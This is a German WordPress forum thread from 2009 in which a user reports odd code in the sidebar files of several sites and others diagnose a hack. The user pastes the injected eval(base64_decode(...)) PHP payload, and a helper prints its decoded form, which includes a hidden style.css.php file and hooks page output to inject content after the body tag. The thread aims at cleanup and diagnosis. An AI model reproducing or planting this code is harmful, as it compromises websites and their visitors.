Sonderbare Zeichen (Codes) in der Sidebar...

  • Ich wollte soeben etwas in der Sidebar ändern... und bekam anhängende Dinge angezeigt.

    Unter diesen Hyroglyphen ist die normale Sidebar.
    Ändere ich etwas und will es speichern kommt Bild 2... da kann ich eingeben was ich lustig bin, bringt mich zurück zum Stylesheet (wo ich nicht hin will)!

    Und auch wenn ich dieses Zeug entferne... gehts nicht speichern!

    Und bei der 3. Website... hätte ich dann 3. Bild zu bieten...

    Was ist da los?
    Weiß jemand Rat? :|

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Hast schon probiert, die sidebar per ftp zu holen, lokal zu bearbeiten und dann wieder hochzuladen?

    Bei ALLEN Websites?! :-|
    Wo kommt'n das her...?
    Und... bei der 3. Website krieg ich ja schon Fehler angezeigt bevor ich überhaupt irgendwas im Adminbereich tue...


    EDIT
    Also, ja das geht, mit dem FTP
    Ich hols runter, löschs raus und lads wieder hoch... da is jetzt zwar ein obstruser dicker fetter schwarzer Fleck am Anfang aber sonst... nur speichern lässt es sich im Adminbereich nach wie vor nicht.

    Einmal editiert, zuletzt von Naley (2. November 2009 um 20:11)

  • Bei ALLEN Websites?! :-|
    Wo kommt'n das her...?
    Und... bei der 3. Website krieg ich ja schon Fehler angezeigt bevor ich überhaupt irgendwas im Adminbereich tue...

    Da war doch vor einiger Zeit was mit einer Sicherheitslücke im WP mit der Bogs gehackt werde konnten. Wenn das passiert ist, standen so eval(base64_decode.... in irgendwelchen Dateien.


    EDIT
    Also, ja das geht, mit dem FTP
    Ich hols runter, löschs raus und lads wieder hoch... da is jetzt zwar ein obstruser dicker fetter schwarzer Fleck am Anfang aber sonst... nur speichern lässt es sich im Adminbereich nach wie vor nicht.

    Dann solltest alle Dateien kontrollieren bzw. google nach der Sicherheitslücke irgendwo gibts sicher eine Anleitung wie man feststellt ob man gehackt wurde, und wenn ja, wie man wieder "sauber" wird.

  • Gehackt?! :shock:

    ALLE?!
    Das is doch'n Witz?!

    Ich mein... das is auch bei der Uralt-WP-Version... da steht auch sowas drin!
    Und ich mein wirklich alt...

    Zitat

    <? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvd3d3L2h0ZG9jcy92MTQ1MDMwL3RvYmV5L29uZXRyZWVoaWxsL3dwLWNvbnRlbnQvcGx1Z2lucy9uZXh0Z2VuLWdhbGxlcnkvYWRtaW4vanMvSmNyb3AvY3NzL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvd3d3L2h0ZG9jcy92MTQ1MDMwL3RvYmV5L29uZXRyZWVoaWxsL3dwLWNvbnRlbnQvcGx1Z2lucy9uZXh0Z2VuLWdhbGxlcnkvYWRtaW4vanMvSmNyb3AvY3NzL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?

    Ich finde einiges... aber nicht wirklich irgendwas, was mir hilft :cry:
    Och man, das darf doch nicht wahr sein... hätte ich den Mist bloß nicht upgedatet... ich war happy mit meiner 2.0.x Version aber nööö... "Da ist keine Sicherheit" hieß es... HA HA HA!

  • Sorry für den DP!!

    Hat das denn wirklich noch keiner gehabt?
    Weiß keiner, was ich tun kann oder wo ich gucken kann?
    Ich finde nichts was speziefisch darauf hinweist... und ich weiß nicht WO genau da was falschläuft...
    Ich kann die nacheinander austauschen - aber ich kann sie trotzdem nicht speichern (im Adminbereich) :(

    Irgendwer?
    BITTE!!

  • Gehackt?! :shock:

    ALLE?!
    Das is doch'n Witz?!

    Ich mein... das is auch bei der Uralt-WP-Version... da steht auch sowas drin!
    Und ich mein wirklich alt...


    Ich finde einiges... aber nicht wirklich irgendwas, was mir hilft :cry:
    Och man, das darf doch nicht wahr sein... hätte ich den Mist bloß nicht upgedatet... ich war happy mit meiner 2.0.x Version aber nööö... "Da ist keine Sicherheit" hieß es... HA HA HA!

    MIr habens vor rd. ein-eineinhalb Jahren auch einmal eine 2.0.x (oder wars eine 2.1.x) Version gehackt.

    Also wenn man die von Dir geposteten "wirren" Zeichen durch einen Online-Base64-Decoder schickt (zB http://www.pixelplaner.com/de/service/onl…code/index.html) bekommt man:

    PHP
    if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/www/htdocs/v145030/tobey/onetreehill/wp-content/plugins/nextgen-gallery/admin/js/Jcrop/css/style.css.php')){include_once('/www/htdocs/v145030/tobey/onetreehill/wp-content/plugins/nextgen-gallery/admin/js/Jcrop/css/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}

    Also zum einen weiteren codierten (diesma mit gzdecode zu decodierenden) Code, zum anderen sieht man einiges im Klartext. So wird zB die Existenz einer Function dgobh abgefragt oder eine style.css.php nachgeladen.

    Die Googlesuche nach dgobh liefert pratksich als ersten Treffer einen Link auf http://www.simplemachines.org/community/index.php?topic=291486.0 da gehts zwar nicht um Wordpress, aber zB der Post von ccondrup erwähnt genauso wie bei Dir eine "style.css.php" die nachgeladen wird.

    Eine Google-Suche nach dgobh und Wordpress liefert auch viele Links, unter anderem einen hier ins Forum: http://forum.wordpress-deutschland.org/konfiguration/…eschlichen.html

    Ich empfehle dir:

    1. http://wpantivirus.de/
    2. http://toscho.de/2009/website-gehackt/

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!